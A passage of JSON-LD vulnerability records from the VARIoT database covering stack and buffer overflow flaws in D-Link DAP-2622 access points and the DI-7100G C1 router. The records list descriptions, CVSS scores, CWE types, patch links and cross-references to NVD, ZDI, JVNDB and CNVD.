"data": "D-Link DAP-2622 DDP Set IPv6 Address Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20092. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37314"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37314",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1268",
"trust": 2.5
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20092",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29684",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"id": "VAR-202308-3358",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29684"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29684"
}
]
},
"last_update_date": "2025-12-19T22:28:22.772000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29684)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776466"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1268/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37314"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-37314"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"date": "2024-05-03T02:15:41.233000",
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"date": "2025-05-14T02:03:00",
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"date": "2025-05-13T13:55:54.570000",
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
}
],
"trust": 0.8
}
}
VAR-202308-3136
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set AG Profile UUID Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20081. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3136",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
}
],
"trust": 0.7
},
"cve": "CVE-2023-35753",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29678",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35753",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35753",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35753",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-35753",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-35753",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-35753",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-35753",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29678",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set AG Profile UUID Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20081. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-35753"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-35753",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1258",
"trust": 2.5
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20081",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29678",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"id": "VAR-202308-3136",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29678"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29678"
}
]
},
"last_update_date": "2025-12-19T22:28:22.745000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29678)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776431"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1258/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-35753"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-35753"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"date": "2024-05-03T02:15:39.867000",
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1258"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29678"
},
{
"date": "2025-05-14T09:04:00",
"db": "JVNDB",
"id": "JVNDB-2023-028911"
},
{
"date": "2025-05-13T13:54:11.120000",
"db": "NVD",
"id": "CVE-2023-35753"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028911"
}
],
"trust": 0.8
}
}
VAR-202510-0075
Vulnerability from variot - Updated: 2025-11-28 23:14A vulnerability has been found in D-Link DI-7100G C1 up to 20250928. This issue affects the function sub_4BD4F8 of the file /webchat/hi_block.asp of the component jhttpd. The manipulation of the argument popupId leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. D-Link Corporation of DI-7100G C1 The firmware contains a buffer error vulnerability and a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DI-7100G C1 is an enterprise-class router designed primarily for small and medium-sized businesses. This vulnerability stems from the failure of the popupId parameter in the /webchat/hi_block.asp file to properly validate the length of input data. An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202510-0075",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "di-7100g c1",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2025-09-28"
},
{
"model": "di-7100g c1",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "di-7100g c1",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "di-7100g c1 firmware 2025-09-28"
},
{
"model": "di-7100g c1",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "di-7100g c1",
"scope": "lte",
"trust": 0.6,
"vendor": "d link",
"version": "\u003c=20250928"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"cve": "CVE-2025-11339",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2025-11339",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "OTHER",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2025-020078",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2025-24760",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2025-11339",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2025-020078",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2025-11339",
"trust": 1.0,
"value": "High"
},
{
"author": "OTHER",
"id": "JVNDB-2025-020078",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2025-24760",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability has been found in D-Link DI-7100G C1 up to 20250928. This issue affects the function sub_4BD4F8 of the file /webchat/hi_block.asp of the component jhttpd. The manipulation of the argument popupId leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. D-Link Corporation of DI-7100G C1 The firmware contains a buffer error vulnerability and a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DI-7100G C1 is an enterprise-class router designed primarily for small and medium-sized businesses. This vulnerability stems from the failure of the popupId parameter in the /webchat/hi_block.asp file to properly validate the length of input data. An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service",
"sources": [
{
"db": "NVD",
"id": "CVE-2025-11339"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "CNVD",
"id": "CNVD-2025-24760"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
